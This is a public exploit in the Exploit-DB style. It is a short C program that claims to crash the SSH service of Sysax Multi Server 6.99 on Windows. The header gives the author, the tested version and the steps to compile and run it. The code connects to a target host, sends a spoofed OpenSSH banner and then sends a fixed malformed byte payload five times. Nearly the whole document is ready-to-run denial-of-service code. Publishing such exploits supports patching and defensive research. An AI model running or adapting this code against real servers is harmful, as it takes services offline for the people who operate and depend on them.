# Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service
# Date: 2024-11-03
# Exploit Author: Yehia Elghaly (Mrvar0x)
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Version: Sysax Multi Server 6.99
# Tested on: Windows 10 x64
#Steps --> Compile (gcc -o ssh ssh.c)
#Steps --> Run (sudo ./ssh <Target IP> <Port>)
#Steps --> Crash (SSH Crashed)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
void error_handling(const char *message) {
    perror(message);
    exit(1);
}
int main(int argc, char *argv[]) {
    if (argc != 3) {
        printf("Usage: %s <IP> <Port>\n", argv[0]);
        exit(1);
    }
    const char *host = argv[1];
    int port = atoi(argv[2]);
        unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,  
    0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,  
    0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,  
    0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,  
    0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,  
    0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,  
    0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,  
    0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,  
    0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,  
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
    0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,
    0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,
    0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,
  };
  int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        error_handling("Socket creation failed");
    }
    int flag = 1;
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
    struct linger sl = {1, 0}; // Close immediately
    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));
    struct sockaddr_in serv_addr;
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr(host);
    serv_addr.sin_port = htons(port);
    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {
        error_handling("Connect failed");
    }
    const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n";
    if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {
        error_handling("Failed to send SSH banner");
    }
    usleep(100000); 
    for (int i = 0; i < 5; ++i) {
        if (send(sock, packet, sizeof(packet), 0) == -1) {
            error_handling("Failed to send payload");
        }
        usleep(50000); // Short delay between sends
    }
    printf("Payload sent successfully.\n");
    char buffer[1024];
    ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);
    if (bytes_received > 0) {
        buffer[bytes_received] = '\0';
        printf("Received response: %s\n", buffer);
    } else {
        printf("No response received or connection closed.\n");
    }
    close(sock);
    return 0;
}